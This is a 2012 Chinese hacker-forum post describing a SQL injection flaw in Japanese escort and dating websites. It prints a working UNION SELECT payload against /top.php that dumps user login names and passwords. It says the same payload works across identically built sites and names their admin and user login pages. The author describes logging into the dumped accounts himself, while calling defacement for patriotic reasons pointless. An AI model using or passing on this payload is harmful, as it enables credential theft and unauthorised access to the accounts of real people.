|
找寻挖掘网络上的漏洞并不是什么见不得光的事,但是因为政治上的问题去入侵日本网站,也不是什么光彩的事情,只会成为炮灰而已
你以为你出了一口气,其实你和傻逼有什么区别。 前台新闻页面未做过滤或者正则,导致可以通过SQL注入语句将援交女的登陆信息爆出来
作者:YoCo Smart
来自:Silic Group Hacker Army
网站地址:http://blackbap.org
漏洞文件:/top.php 前台注入得到援交女的登陆名和登陆密码:
使用注入出来的援交女的登录Blog查看他们的揽客博文(亚麻蝶~打我电话吧~) 
漏洞分析:
注入语句很简单,前台文件一模一样,数据库结构也是一样的,直接套公式好了 1
/top.php?mode=news&t=0+union+select+1,2,3,group_concat(DISTINCT+login_id,0x3a,pass,0x3c62723e),5,6,7,8,9,0,11,12,13+from+m_user%23
后台/admin.php
交友女登陆入口:/user.php
我想说,发本文的目的并非怂恿大家借钓鱼岛事件和918这个日子去黑日本网站,我也没涂鸦任何一个日本网站,just a fun
挖掘漏洞出于对技术的热爱,那么涂鸦别人又是出于什么目的呢?
不要扯淡告诉我你涂鸦是出于爱国,说白了,你为了出名,你不是为了出名,你也是出于骨子里的那股坏劲,爱国?你不查书不搜索,你知道今年是918多少年?别扯淡了
| 
窥视卡
雷达卡
发表于 2012-11-20 02:04:22
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
发表于 2012-11-20 14:27:45